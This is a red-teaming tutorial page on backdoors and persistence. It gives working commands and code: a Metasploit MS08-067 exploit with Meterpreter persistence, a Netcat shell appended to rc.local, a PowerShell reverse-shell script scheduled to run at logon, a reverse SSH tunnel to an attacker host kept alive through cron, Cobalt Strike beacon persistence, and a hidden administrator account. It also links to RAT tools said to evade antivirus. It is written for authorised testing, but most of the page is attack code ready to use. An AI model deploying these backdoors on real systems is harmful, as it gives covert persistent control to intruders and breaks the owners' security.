RedTeamGarage (RTG)
  • RTG
    • About RTG
    • About the Author
    • Order Your Copy – Offensive Red Teaming Book
    • Launching Your Career in Ethical Hacking: A Comprehensive Step-by-Step Guide
  • RED TEAMING ZONE
    • Why Offensive Cyber Red Teaming
  • Red Teaming Methodology
  • Recon for Red Teaming- Theory
  • Recon for Red Teaming- Practical
  • OSINT for Red Teaming
  • Reverse Shell 101
    • Windows Reverse Shell
    • Reverse Shell References
  • Lateral Movement 101
  • Offensive PowerShell
  • Offensive C Sharp (C#)
  • Offensive WMI
  • RDP login with NTLM Hash
  • RDP as a Console
  • Bypassing Windows AppLocker
  • Attacking MSSQL
  • Backdoors
  • Pivoting & Tunneling
  • Cloud in Red Teaming
  • Social Engineering in Red Teaming
Powered by GitBook
On this page

Backdoors

Practical Guide to Backdoors in Red Teaming

Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.

Creating a Persistent Meterpreter Session

Tool: Metasploit

Steps:

  • Exploit a vulnerability to gain an initial foothold.

  • Migrate to a stable process to maintain the session.

  • Set up persistence with a Meterpreter script.

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit

Once the session is established:

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.101

This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.

Using Netcat for a Simple Backdoor

Tool: Netcat

Steps:

  • Transfer Netcat to the target system.

  • Set up a persistent listener on the target system.

Example:

nc -lvp 4444 -e /bin/bash

To make it persistent, add the command to a startup script:

echo 'nc -lvp 4444 -e /bin/bash' >> /etc/rc.local

Using PowerShell for Windows Persistence

Tool: PowerShell

Steps:

  • Create a PowerShell script to establish a reverse shell.

  • Use Task Scheduler to run the script at startup.

Example:

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.101", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()}
$client.Close()

Save this script and schedule it using Task Scheduler:

schtasks /create /sc onlogon /tn "PowerShell Backdoor" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1"

Creating a Reverse SSH Tunnel

Tool: SSH

Steps:

  • Set up a reverse SSH tunnel to maintain access.

Example:

ssh -R 9090:localhost:22 user@attacker-machine.com

To make it persistent, add the command to cron:

(crontab -l ; echo "@reboot ssh -R 9090:localhost:22 user@attacker-machine.com") | crontab -

Deploying Custom Backdoor with C2 Framework

Tool: Cobalt Strike

Steps:

  • Use Cobalt Strike to create a custom beacon.

  • Deploy the beacon on the target system and set it to call back periodically.

Example:

./teamserver <external IP> <password>
./agscript
> spawnb 192.168.1.100

In Cobalt Strike:

beacon> run persistence -script windows/beacon.exe -args 192.168.1.101 4444

Hidden User Accounts: Creating hidden user accounts with elevated privileges.

Example: Creating a Hidden Admin User on Windows:

net user hiddenadmin P@ssw0rd /add
net localgroup administrators hiddenadmin /add

Impact: The hidden user account provides the attacker with administrative access.

Some useful Backdoor references:

Understanding and effectively implementing persistence and backdoor techniques are critical for simulating advanced attack scenarios in red teaming engagements. While common backdoors are increasingly detected by EDRs, some methods can still circumvent these defenses by using advanced Red Teaming techniques that we cover in our live Red Teaming workshops.

PreviousAttacking MSSQLNextPivoting & Tunneling

Last updated 11 months ago

GitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .GitHub
GitHub - karma9874/AndroRAT: A Simple android remote administration tool using sockets. It uses java on the client side and python on the server sideGitHub
GitHub - n1nj4sec/pupy: Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in pythonGitHub
Logo
Logo
Logo